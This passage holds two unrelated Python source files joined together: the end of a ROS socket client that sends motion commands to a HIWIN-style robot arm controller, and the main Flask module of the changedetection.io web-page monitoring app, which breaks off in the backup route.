data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#------- set the arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#------- set the arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#------- set the arm fast/safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action = 5 ## reset to the initial (idle) mode state
Socket.send(data.encode('utf-8')) # encode the command string and send it over the socket
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
#start_input = int(input('Press 1 to start transmission, 3 to exit: ')) # read the start command
start_input = 1
if start_input==1:
while 1:
feedback_str = Socket.recv(1024)
# the arm side reports its state in the feedback packet
if str(feedback_str[2]) == '70': # 70 == ord('F'): arm is Ready to accept the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84': # 84 == ord('T'): arm is busy and cannot take the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54': # 54 == ord('6'): strategy finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
# check the transmission flag
if str(feedback_str[4]) == '48': # 48 == ord('0'): flag is false
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49': # 49 == ord('1'): flag is true
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
##--------------- send arm commands over the socket end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
Socket.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## multithreading
def thread_command():
global arm_mode_flag
if arm_mode_flag == True:
arm_mode_flag = False
Socket_command()
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5 ## start in the initial (idle) mode state
t = threading.Thread(target=thread_test)
s = threading.Thread(target=thread_command)
t.start() # start the worker threads
s.start()
socket_server()
t.join()
s.join()
# Ctrl+K Ctrl+C   Add line comment
# Ctrl+K Ctrl+U   Remove line comment
# Ctrl+] / Ctrl+[   Indent / outdent line
|
__init__.py
|
#!/usr/bin/python3
# @todo logging
# @todo extra options for url like , verify=False etc.
# @todo enable https://urllib3.readthedocs.io/en/latest/user-guide.html#ssl as option?
# @todo option for interval day/6 hour/etc
# @todo on change detected, config for calling some API
# @todo fetch title into json
# https://distill.io/features
# proxy per check
# - flask_cors, itsdangerous,MarkupSafe
import datetime
import os
import queue
import threading
import time
from copy import deepcopy
from threading import Event
import flask_login
import logging
import pytz
import timeago
from feedgen.feed import FeedGenerator
from flask import (
Flask,
abort,
flash,
make_response,
redirect,
render_template,
request,
send_from_directory,
session,
url_for,
)
from flask_login import login_required
from flask_restful import abort, Api
from flask_wtf import CSRFProtect
from changedetectionio import html_tools
from changedetectionio.api import api_v1
__version__ = '0.39.14'
datastore = None
# Local
running_update_threads = []
ticker_thread = None
extra_stylesheets = []
update_q = queue.Queue()
notification_q = queue.Queue()
app = Flask(__name__,
static_url_path="",
static_folder="static",
template_folder="templates")
# Stop browser caching of assets
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.config.exit = Event()
app.config['NEW_VERSION_AVAILABLE'] = False
app.config['LOGIN_DISABLED'] = False
#app.config["EXPLAIN_TEMPLATE_LOADING"] = True
# Disables caching of the templates
app.config['TEMPLATES_AUTO_RELOAD'] = True
csrf = CSRFProtect()
csrf.init_app(app)
notification_debug_log=[]
watch_api = Api(app, decorators=[csrf.exempt])
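# Generate (on first run) and persist a random Flask secret key under
# <datastore_path>/secret.txt so that sessions survive application restarts.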
def init_app_secret(datastore_path):
secret = ""
path = "{}/secret.txt".format(datastore_path)
try:
with open(path, "r") as f:
secret = f.read()
except FileNotFoundError:
import secrets
with open(path, "w") as f:
secret = secrets.token_hex(32)
f.write(secret)
return secret
# We use the whole watch object from the store/JSON so we can see if there's some related status in terms of a thread
# running or something similar.
@app.template_filter('format_last_checked_time')
def _jinja2_filter_datetime(watch_obj, format="%Y-%m-%d %H:%M:%S"):
# Worker thread tells us which UUID it is currently processing.
for t in running_update_threads:
if t.current_uuid == watch_obj['uuid']:
return "Checking now.."
if watch_obj['last_checked'] == 0:
return 'Not yet'
return timeago.format(int(watch_obj['last_checked']), time.time())
# @app.context_processor
# def timeago():
# def _timeago(lower_time, now):
# return timeago.format(lower_time, now)
# return dict(timeago=_timeago)
@app.template_filter('format_timestamp_timeago')
def _jinja2_filter_datetimestamp(timestamp, format="%Y-%m-%d %H:%M:%S"):
return timeago.format(timestamp, time.time())
# return timeago.format(timestamp, time.time())
# return datetime.datetime.utcfromtimestamp(timestamp).strftime(format)
# When nobody is logged in Flask-Login's current_user is set to an AnonymousUser object.
class User(flask_login.UserMixin):
id=None
def set_password(self, password):
return True
def get_user(self, email="defaultuser@changedetection.io"):
return self
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return str(self.id)
# Compare given password against JSON store or Env var
def check_password(self, password):
import base64
import hashlib
# Can be stored in env (for deployments) or in the general configs
raw_salt_pass = os.getenv("SALTED_PASS", False)
if not raw_salt_pass:
raw_salt_pass = datastore.data['settings']['application']['password']
raw_salt_pass = base64.b64decode(raw_salt_pass)
salt_from_storage = raw_salt_pass[:32] # 32 is the length of the salt
# Use the exact same setup you used to generate the key, but this time put in the password to check
new_key = hashlib.pbkdf2_hmac(
'sha256',
password.encode('utf-8'), # Convert the password to bytes
salt_from_storage,
100000
)
new_key = salt_from_storage + new_key
return new_key == raw_salt_pass
pass
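# A minimal sketch (not part of this module) of producing a value that
# check_password() above would accept - the stored password is
# base64(salt + pbkdf2_key), with a 32-byte salt and the same PBKDF2 parameters:
#
#   import base64, hashlib, secrets
#   salt = secrets.token_bytes(32)
#   key = hashlib.pbkdf2_hmac('sha256', 'my-password'.encode('utf-8'), salt, 100000)
#   stored = base64.b64encode(salt + key)  # -> settings password / SALTED_PASS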
def changedetection_app(config=None, datastore_o=None):
global datastore
datastore = datastore_o
# so far just for read-only via tests, but this will be moved eventually to be the main source
# (instead of the global var)
app.config['DATASTORE']=datastore_o
#app.config.update(config or {})
login_manager = flask_login.LoginManager(app)
login_manager.login_view = 'login'
app.secret_key = init_app_secret(config['datastore_path'])
watch_api.add_resource(api_v1.WatchSingleHistory,
'/api/v1/watch/<string:uuid>/history/<string:timestamp>',
resource_class_kwargs={'datastore': datastore, 'update_q': update_q})
watch_api.add_resource(api_v1.WatchHistory,
'/api/v1/watch/<string:uuid>/history',
resource_class_kwargs={'datastore': datastore})
watch_api.add_resource(api_v1.CreateWatch, '/api/v1/watch',
resource_class_kwargs={'datastore': datastore, 'update_q': update_q})
watch_api.add_resource(api_v1.Watch, '/api/v1/watch/<string:uuid>',
resource_class_kwargs={'datastore': datastore, 'update_q': update_q})
# Setup cors headers to allow all domains
# https://flask-cors.readthedocs.io/en/latest/
# CORS(app)
@login_manager.user_loader
def user_loader(email):
user = User()
user.get_user(email)
return user
@login_manager.unauthorized_handler
def unauthorized_handler():
# @todo validate its a URL of this host and use that
return redirect(url_for('login', next=url_for('index')))
@app.route('/logout')
def logout():
flask_login.logout_user()
return redirect(url_for('index'))
# https://github.com/pallets/flask/blob/93dd1709d05a1cf0e886df6223377bdab3b077fb/examples/tutorial/flaskr/__init__.py#L39
# You can divide up the stuff like this
@app.route('/login', methods=['GET', 'POST'])
def login():
if not datastore.data['settings']['application']['password'] and not os.getenv("SALTED_PASS", False):
flash("Login not required, no password enabled.", "notice")
return redirect(url_for('index'))
if request.method == 'GET':
if flask_login.current_user.is_authenticated:
flash("Already logged in")
return redirect(url_for("index"))
output = render_template("login.html")
return output
user = User()
user.id = "defaultuser@changedetection.io"
password = request.form.get('password')
if (user.check_password(password)):
flask_login.login_user(user, remember=True)
# For now there's nothing else interesting here other than the index/list page
# It's more reliable and safe to ignore the 'next' redirect
# When we used...
# next = request.args.get('next')
# return redirect(next or url_for('index'))
# We would sometimes get login loop errors on sites hosted in sub-paths
# note for the future:
# if not is_safe_url(next):
# return flask.abort(400)
return redirect(url_for('index'))
else:
flash('Incorrect password', 'error')
return redirect(url_for('login'))
@app.before_request
def do_something_whenever_a_request_comes_in():
# Disable password login if there is not one set
# (No password in settings or env var)
app.config['LOGIN_DISABLED'] = datastore.data['settings']['application']['password'] == False and os.getenv("SALTED_PASS", False) == False
# Set the auth cookie path if we're running as X-settings/X-Forwarded-Prefix
if os.getenv('USE_X_SETTINGS') and 'X-Forwarded-Prefix' in request.headers:
app.config['REMEMBER_COOKIE_PATH'] = request.headers['X-Forwarded-Prefix']
app.config['SESSION_COOKIE_PATH'] = request.headers['X-Forwarded-Prefix']
# For the RSS path, allow access via a token
if request.path == '/rss' and request.args.get('token'):
app_rss_token = datastore.data['settings']['application']['rss_access_token']
rss_url_token = request.args.get('token')
if app_rss_token == rss_url_token:
app.config['LOGIN_DISABLED'] = True
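# i.e. a GET of /rss?token=<rss_access_token> can be fetched by feed readers
# without logging in; the flag is recalculated on every request by this
# before_request handler.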
@app.route("/rss", methods=['GET'])
@login_required
def rss():
from . import diff
limit_tag = request.args.get('tag')
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
# @todo needs a .itemsWithTag() or something
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
fg = FeedGenerator()
fg.title('changedetection.io')
fg.description('Feed description')
fg.link(href='https://changedetection.io')
for watch in sorted_watches:
dates = list(watch.history.keys())
# Re #521 - Don't bother processing this one if there are fewer than 2 snapshots, it means we never had a change detected.
if len(dates) < 2:
continue
prev_fname = watch.history[dates[-2]]
if not watch.viewed:
# Re #239 - GUID needs to be individual for each event
# @todo In the future make this a configurable link back (see work on BASE_URL https://github.com/dgtlmoon/changedetection.io/pull/228)
guid = "{}/{}".format(watch['uuid'], watch['last_changed'])
fe = fg.add_entry()
# Include a link to the diff page, they will have to login here to see if password protection is enabled.
# Description is the page you watch, link takes you to the diff JS UI page
base_url = datastore.data['settings']['application']['base_url']
if base_url == '':
base_url = "<base-url-env-var-not-set>"
diff_link = {'href': "{}{}".format(base_url, url_for('diff_history_page', uuid=watch['uuid']))}
fe.link(link=diff_link)
# @todo watch should be a getter - watch.get('title') (internally if URL else..)
watch_title = watch.get('title') if watch.get('title') else watch.get('url')
fe.title(title=watch_title)
latest_fname = watch.history[dates[-1]]
html_diff = diff.render_diff(prev_fname, latest_fname, include_equal=False, line_feed_sep="</br>")
fe.content(content="<html><body><h4>{}</h4>{}</body></html>".format(watch_title, html_diff),
type='CDATA')
fe.guid(guid, permalink=False)
dt = datetime.datetime.fromtimestamp(int(watch.newest_history_key))
dt = dt.replace(tzinfo=pytz.UTC)
fe.pubDate(dt)
response = make_response(fg.rss_str())
response.headers.set('Content-Type', 'application/rss+xml')
return response
@app.route("/", methods=['GET'])
@login_required
def index():
from changedetectionio import forms
limit_tag = request.args.get('tag')
pause_uuid = request.args.get('pause')
# Redirect for the old rss path which used the /?rss=true
if request.args.get('rss'):
return redirect(url_for('rss', tag=limit_tag))
if pause_uuid:
try:
datastore.data['watching'][pause_uuid]['paused'] ^= True
datastore.needs_write = True
return redirect(url_for('index', tag = limit_tag))
except KeyError:
pass
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
if watch['tag'] is None:
continue
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
existing_tags = datastore.get_all_tags()
form = forms.quickWatchForm(request.form)
output = render_template("watch-overview.html",
form=form,
watches=sorted_watches,
tags=existing_tags,
active_tag=limit_tag,
app_rss_token=datastore.data['settings']['application']['rss_access_token'],
has_unviewed=datastore.has_unviewed,
# Don't link to hosting when we're on the hosting environment
hosted_sticky=os.getenv("SALTED_PASS", False) == False,
guid=datastore.data['app_guid'],
queued_uuids=update_q.queue)
if session.get('share-link'):
del(session['share-link'])
return output
# AJAX endpoint for sending a test
@app.route("/notification/send-test", methods=['POST'])
@login_required
def ajax_callback_send_notification_test():
import apprise
apobj = apprise.Apprise()
# validate URLS
if not len(request.form['notification_urls'].strip()):
return make_response({'error': 'No Notification URLs set'}, 400)
for server_url in request.form['notification_urls'].splitlines():
if len(server_url.strip()):
if not apobj.add(server_url):
message = '{} is not a valid AppRise URL.'.format(server_url)
return make_response({'error': message}, 400)
try:
n_object = {'watch_url': request.form['window_url'],
'notification_urls': request.form['notification_urls'].splitlines(),
'notification_title': request.form['notification_title'].strip(),
'notification_body': request.form['notification_body'].strip(),
'notification_format': request.form['notification_format'].strip()
}
notification_q.put(n_object)
except Exception as e:
return make_response({'error': str(e)}, 400)
return 'OK'
@app.route("/scrub/<string:uuid>", methods=['GET'])
@login_required
def scrub_watch(uuid):
try:
datastore.scrub_watch(uuid)
except KeyError:
flash('Watch not found', 'error')
else:
flash("Scrubbed watch {}".format(uuid))
return redirect(url_for('index'))
@app.route("/scrub", methods=['GET', 'POST'])
@login_required
def scrub_page():
if request.method == 'POST':
confirmtext = request.form.get('confirmtext')
if confirmtext == 'scrub':
changes_removed = 0
for uuid in datastore.data['watching'].keys():
datastore.scrub_watch(uuid)
flash("Cleared all snapshot history")
else:
flash('Incorrect confirmation text.', 'error')
return redirect(url_for('index'))
output = render_template("scrub.html")
return output
# If they edited an existing watch, we need to know to reset the current/previous md5 to include
# the excluded text.
def get_current_checksum_include_ignore_text(uuid):
import hashlib
from changedetectionio import fetch_site_status
# Get the most recent one
newest_history_key = datastore.get_val(uuid, 'newest_history_key')
# 0 means there's only one snapshot, so there should be no 'unviewed' history available
if newest_history_key == 0:
newest_history_key = list(datastore.data['watching'][uuid].history.keys())[0]
if newest_history_key:
with open(datastore.data['watching'][uuid].history[newest_history_key],
encoding='utf-8') as file:
raw_content = file.read()
handler = fetch_site_status.perform_site_check(datastore=datastore)
stripped_content = html_tools.strip_ignore_text(raw_content,
datastore.data['watching'][uuid]['ignore_text'])
if datastore.data['settings']['application'].get('ignore_whitespace', False):
checksum = hashlib.md5(stripped_content.translate(None, b'\r\n\t ')).hexdigest()
else:
checksum = hashlib.md5(stripped_content).hexdigest()
return checksum
return datastore.data['watching'][uuid]['previous_md5']
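# Note: with ignore_whitespace enabled, translate(None, b'\r\n\t ') strips those
# bytes before hashing, so e.g. b"a \r\n b" and b"ab" produce the same md5 and
# whitespace-only changes are not reported.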
@app.route("/edit/<string:uuid>", methods=['GET', 'POST'])
@login_required
# https://stackoverflow.com/questions/42984453/wtforms-populate-form-with-data-if-data-exists
# https://wtforms.readthedocs.io/en/3.0.x/forms/#wtforms.form.Form.populate_obj ?
def edit_page(uuid):
from changedetectionio import forms
using_default_check_time = True
# More for testing, possible to return the first/only
if not datastore.data['watching'].keys():
flash("No watches to edit", "error")
return redirect(url_for('index'))
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
if not uuid in datastore.data['watching']:
flash("No watch with the UUID %s found." % (uuid), "error")
return redirect(url_for('index'))
# be sure we update with a copy instead of accidentally editing the live object by reference
default = deepcopy(datastore.data['watching'][uuid])
# Show system wide default if nothing configured
if datastore.data['watching'][uuid]['fetch_backend'] is None:
default['fetch_backend'] = datastore.data['settings']['application']['fetch_backend']
# Show system wide default if nothing configured
if all(value == 0 or value == None for value in datastore.data['watching'][uuid]['time_between_check'].values()):
default['time_between_check'] = deepcopy(datastore.data['settings']['requests']['time_between_check'])
# Defaults for proxy choice
if datastore.proxy_list is not None: # When enabled
# The radio field needs '' rather than None; this also covers the case where the chosen proxy no longer exists
if default['proxy'] is None or not any(default['proxy'] in tup for tup in datastore.proxy_list):
default['proxy'] = ''
# proxy_override set to the json/text list of the items
form = forms.watchForm(formdata=request.form if request.method == 'POST' else None,
data=default,
)
if datastore.proxy_list is None:
# @todo - Couldn't get setattr() etc dynamic addition working, so remove it instead
del form.proxy
else:
form.proxy.choices = [('', 'Default')] + datastore.proxy_list
if request.method == 'POST' and form.validate():
extra_update_obj = {}
# Re #110, if they submit the same as the default value, set it to None, so we continue to follow the default
# Assume we use the default value, unless something relevant is different, then use the form value
# values could be None, 0 etc.
# Set to None unless the next for: says that something is different
extra_update_obj['time_between_check'] = dict.fromkeys(form.time_between_check.data)
for k, v in form.time_between_check.data.items():
if v and v != datastore.data['settings']['requests']['time_between_check'][k]:
extra_update_obj['time_between_check'] = form.time_between_check.data
using_default_check_time = False
break
# Use the default if its the same as system wide
if form.fetch_backend.data == datastore.data['settings']['application']['fetch_backend']:
extra_update_obj['fetch_backend'] = None
# Notification URLs
datastore.data['watching'][uuid]['notification_urls'] = form.notification_urls.data
# Ignore text
form_ignore_text = form.ignore_text.data
datastore.data['watching'][uuid]['ignore_text'] = form_ignore_text
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form_ignore_text:
if len(datastore.data['watching'][uuid].history):
extra_update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form.css_filter.data.strip() != datastore.data['watching'][uuid]['css_filter']:
if len(datastore.data['watching'][uuid].history):
extra_update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
# Be sure proxy value is None
if datastore.proxy_list is not None and form.data['proxy'] == '':
extra_update_obj['proxy'] = None
datastore.data['watching'][uuid].update(form.data)
datastore.data['watching'][uuid].update(extra_update_obj)
flash("Updated watch.")
# Re #286 - We wait for syncing new data to disk in another thread every 60 seconds
# But in the case something is added we should save straight away
datastore.needs_write_urgent = True
# Queue the watch for immediate recheck
update_q.put(uuid)
# Diff page [edit] link should go back to diff page
if request.args.get("next") and request.args.get("next") == 'diff' and not form.save_and_preview_button.data:
return redirect(url_for('diff_history_page', uuid=uuid))
else:
if form.save_and_preview_button.data:
flash('You may need to reload this page to see the new content.')
return redirect(url_for('preview_page', uuid=uuid))
else:
return redirect(url_for('index'))
else:
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
visualselector_data_is_ready = datastore.visualselector_data_is_ready(uuid)
# Only works reliably with Playwright
visualselector_enabled = os.getenv('PLAYWRIGHT_DRIVER_URL', False) and default['fetch_backend'] == 'html_webdriver'
output = render_template("edit.html",
uuid=uuid,
watch=datastore.data['watching'][uuid],
form=form,
has_empty_checktime=using_default_check_time,
using_global_webdriver_wait=default['webdriver_delay'] is None,
current_base_url=datastore.data['settings']['application']['base_url'],
emailprefix=os.getenv('NOTIFICATION_MAIL_BUTTON_PREFIX', False),
visualselector_data_is_ready=visualselector_data_is_ready,
visualselector_enabled=visualselector_enabled
)
return output
@app.route("/settings", methods=['GET', "POST"])
@login_required
def settings_page():
from changedetectionio import content_fetcher, forms
default = deepcopy(datastore.data['settings'])
if datastore.proxy_list is not None:
# When enabled
system_proxy = datastore.data['settings']['requests']['proxy']
# In case it doesn't exist anymore
if not any([system_proxy in tup for tup in datastore.proxy_list]):
system_proxy = None
default['requests']['proxy'] = system_proxy if system_proxy is not None else datastore.proxy_list[0][0]
# Used by the form handler to keep or remove the proxy settings
default['proxy_list'] = datastore.proxy_list
# Don't use form.data on POST so that it doesn't override the checkbox status from the POST data
form = forms.globalSettingsForm(formdata=request.form if request.method == 'POST' else None,
data=default
)
if datastore.proxy_list is None:
# @todo - Couldn't get setattr() etc dynamic addition working, so remove it instead
del form.requests.form.proxy
else:
form.requests.form.proxy.choices = datastore.proxy_list
if request.method == 'POST':
# Password unset is a GET, but we can lock the session to a salted env password to always need the password
if form.application.form.data.get('removepassword_button', False):
# SALTED_PASS means the password is "locked" to what we set in the Env var
if not os.getenv("SALTED_PASS", False):
datastore.remove_password()
flash("Password protection removed.", 'notice')
flask_login.logout_user()
return redirect(url_for('settings_page'))
if form.validate():
datastore.data['settings']['application'].update(form.data['application'])
datastore.data['settings']['requests'].update(form.data['requests'])
if not os.getenv("SALTED_PASS", False) and len(form.application.form.password.encrypted_password):
datastore.data['settings']['application']['password'] = form.application.form.password.encrypted_password
datastore.needs_write_urgent = True
flash("Password protection enabled.", 'notice')
flask_login.logout_user()
return redirect(url_for('index'))
datastore.needs_write_urgent = True
flash("Settings updated.")
else:
flash("An error occurred, please see below.", "error")
output = render_template("settings.html",
form=form,
current_base_url = datastore.data['settings']['application']['base_url'],
hide_remove_pass=os.getenv("SALTED_PASS", False),
api_key=datastore.data['settings']['application'].get('api_access_token'),
emailprefix=os.getenv('NOTIFICATION_MAIL_BUTTON_PREFIX', False))
return output
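# Import page: accepts a newline-separated list of URLs or a Distill.io JSON export, queues each
# newly created watch for an immediate check, and re-renders any URLs that could not be imported.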
@app.route("/import", methods=['GET', "POST"])
@login_required
def import_page():
remaining_urls = []
if request.method == 'POST':
from .importer import import_url_list, import_distill_io_json
# URL List import
if request.values.get('urls') and len(request.values.get('urls').strip()):
# Import and push into the queue for immediate update check
importer = import_url_list()
importer.run(data=request.values.get('urls'), flash=flash, datastore=datastore)
for uuid in importer.new_uuids:
update_q.put(uuid)
if len(importer.remaining_data) == 0:
return redirect(url_for('index'))
else:
remaining_urls = importer.remaining_data
# Distill.io import
if request.values.get('distill-io') and len(request.values.get('distill-io').strip()):
# Import and push into the queue for immediate update check
d_importer = import_distill_io_json()
d_importer.run(data=request.values.get('distill-io'), flash=flash, datastore=datastore)
for uuid in d_importer.new_uuids:
update_q.put(uuid)
# Could be some remaining, or we could be on GET
output = render_template("import.html",
import_url_list_remaining="\n".join(remaining_urls),
original_distill_json=''
)
return output
# Clear all statuses, so we do not see the 'unviewed' class
@app.route("/form/mark-all-viewed", methods=['GET'])
@login_required
def mark_all_viewed():
# Save the current newest history as the most recently viewed
for watch_uuid, watch in datastore.data['watching'].items():
datastore.set_last_viewed(watch_uuid, int(time.time()))
return redirect(url_for('index'))
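# Diff page: requires at least two saved snapshots, compares the newest snapshot against a chosen
# (or the second-newest) previous version, and marks the watch as viewed.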
@app.route("/diff/<string:uuid>", methods=['GET'])
@login_required
def diff_history_page(uuid):
# Mostly for testing; makes it possible to address the first/only watch
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
history = watch.history
dates = list(history.keys())
if len(dates) < 2:
flash("Not enough saved change detection snapshots to produce a report.", "error")
return redirect(url_for('index'))
# Save the current newest history as the most recently viewed
datastore.set_last_viewed(uuid, time.time())
newest_file = history[dates[-1]]
try:
with open(newest_file, 'r') as f:
newest_version_file_contents = f.read()
except Exception as e:
newest_version_file_contents = "Unable to read {}.\n".format(newest_file)
previous_version = request.args.get('previous_version')
try:
previous_file = history[previous_version]
except KeyError:
# Not present, use a default value, the second one in the sorted list.
previous_file = history[dates[-2]]
try:
with open(previous_file, 'r') as f:
previous_version_file_contents = f.read()
except Exception as e:
previous_version_file_contents = "Unable to read {}.\n".format(previous_file)
screenshot_url = datastore.get_screenshot(uuid)
system_uses_webdriver = datastore.data['settings']['application']['fetch_backend'] == 'html_webdriver'
is_html_webdriver = True if watch.get('fetch_backend') == 'html_webdriver' or (
watch.get('fetch_backend', None) is None and system_uses_webdriver) else False
output = render_template("diff.html",
watch_a=watch,
newest=newest_version_file_contents,
previous=previous_version_file_contents,
extra_stylesheets=extra_stylesheets,
versions=dates[1:],
uuid=uuid,
newest_version_timestamp=dates[-1],
current_previous_version=str(previous_version),
current_diff_url=watch['url'],
extra_title=" - Diff - {}".format(watch['title'] if watch['title'] else watch['url']),
left_sticky=True,
screenshot=screenshot_url,
is_html_webdriver=is_html_webdriver)
return output
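# Preview page: renders the most recent snapshot line by line, tagging lines that match the
# ignore rules or trigger text so the template can highlight them.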
@app.route("/preview/<string:uuid>", methods=['GET'])
@login_required
def preview_page(uuid):
content = []
ignored_line_numbers = []
trigger_line_numbers = []
# Mostly for testing; makes it possible to address the first/only watch
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
if watch.history_n > 0:
timestamps = sorted(watch.history.keys(), key=lambda x: int(x))
filename = watch.history[timestamps[-1]]
try:
with open(filename, 'r') as f:
tmp = f.readlines()
# Get what needs to be highlighted
ignore_rules = watch.get('ignore_text', []) + datastore.data['settings']['application']['global_ignore_text']
# .readlines() keeps the trailing \n; we join and re-parse the content here, tidy this up in the future
ignored_line_numbers = html_tools.strip_ignore_text(content="".join(tmp),
wordlist=ignore_rules,
mode='line numbers'
)
trigger_line_numbers = html_tools.strip_ignore_text(content="".join(tmp),
wordlist=watch['trigger_text'],
mode='line numbers'
)
# Prepare the classes and lines used in the template
i=0
for l in tmp:
classes=[]
i+=1
if i in ignored_line_numbers:
classes.append('ignored')
if i in trigger_line_numbers:
classes.append('triggered')
content.append({'line': l, 'classes': ' '.join(classes)})
except Exception as e:
content.append({'line': "File doesnt exist or unable to read file {}".format(filename), 'classes': ''})
else:
content.append({'line': "No history found", 'classes': ''})
screenshot_url = datastore.get_screenshot(uuid)
system_uses_webdriver = datastore.data['settings']['application']['fetch_backend'] == 'html_webdriver'
is_html_webdriver = True if watch.get('fetch_backend') == 'html_webdriver' or (
watch.get('fetch_backend', None) is None and system_uses_webdriver) else False
output = render_template("preview.html",
content=content,
extra_stylesheets=extra_stylesheets,
ignored_line_numbers=ignored_line_numbers,
triggered_line_numbers=trigger_line_numbers,
current_diff_url=watch['url'],
screenshot=screenshot_url,
watch=watch,
uuid=uuid,
is_html_webdriver=is_html_webdriver)
return output
@app.route("/settings/notification-logs", methods=['GET'])
@login_required
def notification_logs():
global notification_debug_log
output = render_template("notification-log.html",
logs=notification_debug_log if len(notification_debug_log) else ["No errors or warnings detected"])
return output
@app.route("/favicon.ico", methods=['GET'])
def favicon():
return send_from_directory("static/images", path="favicon.ico")
# We're good but backups are even better!
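# The backup zip contains url-watches.json, secret.txt, every snapshot .txt belonging to a known
# watch UUID, plus plain-text URL lists (with and without tags).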
@app.route("/backup", methods=['GET'])
@login_required
def get_backup():
import zipfile
from pathlib import Path
# Remove any existing backup file, for now we just keep one file
for previous_backup_filename in Path(datastore_o.datastore_path).rglob('changedetection-backup-*.zip'):
os.unlink(previous_backup_filename)
# create a ZipFile object
backupname = "changedetection-backup-{}.zip".format(int(time.time()))
# We only care about UUIDs from the current index file
uuids = list(datastore.data['watching'].keys())
backup_filepath = os.path.join(datastore_o.datastore_path, backupname)
with zipfile.ZipFile(backup_filepath, "w",
compression=zipfile.ZIP_DEFLATED,
compresslevel=8) as zipObj:
# Be sure fresh data has been written to disk
datastore.sync_to_json()
# Add the index
zipObj.write(os.path.join(datastore_o.datastore_path, "url-watches.json"), arcname="url-watches.json")
# Add the flask app secret
zipObj.write(os.path.join(datastore_o.datastore_path, "secret.txt"), arcname="secret.txt")
# Add any snapshot data we find, use the full path to access the file, but make the file 'relative' in the Zip.
for txt_file_path in Path(datastore_o.datastore_path).rglob('*.txt'):
parent_p = txt_file_path.parent
if parent_p.name in uuids:
zipObj.write(txt_file_path,
arcname=str(txt_file_path).replace(datastore_o.datastore_path, ''),
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
# Create a list file with just the URLs, so it's easier to port somewhere else in the future
list_file = "url-list.txt"
with open(os.path.join(datastore_o.datastore_path, list_file), "w") as f:
for uuid in datastore.data["watching"]:
url = datastore.data["watching"][uuid]["url"]
f.write("{}\r\n".format(url))
list_with_tags_file = "url-list-with-tags.txt"
with open(
